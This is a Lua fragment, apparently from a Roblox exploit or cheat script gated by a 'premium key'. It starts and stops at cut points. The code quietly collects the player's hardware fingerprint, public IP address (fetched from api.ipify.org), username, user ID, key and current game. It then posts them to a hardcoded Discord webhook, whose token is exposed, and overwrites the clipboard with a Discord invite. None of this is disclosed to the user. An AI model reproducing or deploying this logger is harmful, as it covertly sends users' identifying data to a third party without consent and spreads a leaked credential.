                if getgenv().xw0DLBPTqZkzEWOXx6qCScoNKSoBhGh or getgenv().UtlpHuOwhroliTt4DRSwzv4qdQYuK9M == true then
                    if getgenv().aPePZhyhv3J1HCY0MdZdlTByaFm7aehjH68UG8YK ~= true then
        
        local http_request = syn and syn.request or request

        local body = http_request({Url = "https://httpbin.org/get", Method = "GET"}).Body
        local decoded = game:GetService("HttpService"):JSONDecode(body)
        local hwidCheck = decoded.headers["Syn-Fingerprint"] or decoded.headers["Krnl-Fingerprint"] or decoded.headers["Delta-Fingerprint"] or decoded.headers["Evon-Fingerprint"] or decoded.headers["Sw-Fingerprint"]
        
        local Player = game.Players.LocalPlayer

        local ip = tostring(game:HttpGet("https://api.ipify.org", true))

        local DiscordWebhook =
            "https://discord.com/api/webhooks/1075102508906729603/HDzj3EA-yTk-5lrjSjsPnuC9r_-pS8ic5Wthg3fC1UeBF1qplN1Tr8_u1KGM2PpT8H4u"
        getgenv().embedcolor = "0x8701ff"

        setclipboard("https://discord.com/invite/JN6wgVrUAr")

        local a = os.time()
        local a = os.date("!*t", a)
        plr = game:GetService "Players".LocalPlayer
        local b = false
        local c = false
        if plr.MembershipType == Enum.MembershipType.Premium then
            b = true
        elseif plr.MembershipType == Enum.MembershipType.None then
            b = false
        end
        if b == false then
            if plr.AccountAge <= 70 then
                c = true
            end
        end
        local c = game:GetService("MarketplaceService")
        local c = c:GetProductInfo(game.PlaceId, Enum.InfoType.Asset)
        local function d()
            local a =
                (TRIGON_LOADED and "Trigon EVO") or (syn and not is_sirhurt_closure and not pebc_execute and "Synapse X") or
                (secure_load and "Sentinel") or
                (EVON_LOADED and "Evon") or
                (is_sirhurt_closure and "Sirhurt") or
                (pebc_execute and "ProtoSmasher") or
                (KRNL_LOADED and "Krnl") or
                (OXYGEN_LOADED and "Oxygen U") or
                (WrapGlobal and "WeAreDevs") or
                (IsElectron and "Electron") or
                (isvm and "Proxo") or
                (shadow_env and "Shadow") or
                (jit and "EasyExploits") or
                (getreg()["CalamariLuaEnv"] and "Calamari") or
                (unit and "‎") or
                (IS_VIVA_LOADED and "VIVA") or
                (IS_COCO_LOADED and "Coco") or
                ("Unsupported Executor")
            return a
        end
        local a = {
            ["title"] = "> **" .. Game.Players.LocalPlayer.Name .. " Has Used The Premium Key**",
            ["description"] = "```This was detected on " .. c.Name .. "```",
            ["type"] = "rich",
            ["color"] = tonumber(getgenv().embedcolor),
            ["thumbnail"] = {
                ["url"] = "https://www.roblox.com/headshot-thumbnail/image?userId=" ..
                    plr.UserId .. "&width=420&height=420&format=png"
            },
            ["image"] = {
                ["url"] = "http://www.roblox.com/Thumbs/Asset.ashx?Width=768&Height=432&AssetID=" .. game.PlaceId
            },
            ["fields"] = {
                {
                    ["name"] = "Premium Info",
                    ["value"] = "```Premium Info ▶ " .. tostring(getgenv().islPremium) .. "```",
                    ["inline"] = true
                },
                {
                    ["name"] = "Key Info",
                    ["value"] = "```Key Info ▶ " .. tostring(TheLatestKey) .. "```",
                    ["inline"] = true
                },
                {
                    ["name"] = "HWID",
                    ["value"] = "```HWID ▶ " .. hwidCheck .. "```",
                    ["inline"] = false
                },
                {
                    ["name"] = "IP Adress Info",
                    ["value"] = "```IP Address ▶ " .. tostring(ip) .. "```",
                    ["inline"] = false
                }
            },
            ["footer"] = {
                ["text"] = "🔔 Executed by " .. Game.Players.LocalPlayer.Name .. " on " .. c.Name .. "",
                ["icon_url"] = "https://www.roblox.com/headshot-thumbnail/image?userId=" ..
                    plr.UserId .. "&width=420&height=420&format=png"
            },
            ["timestamp"] = string.format("%d-%d-%dT%02d:%02d:%02dZ", a.year, a.month, a.day, a.hour, a.min, a.sec)
        }
        (syn and syn.request or http_request or http.request) {
            Url = "" .. DiscordWebhook .. "",
            Method = "POST",
            Headers = {
                ["Content-Type"] = "application/json"
            },
            Body = game:GetService "HttpService":JSONEncode({content = Content, embeds = {a}})
        }
    end
end
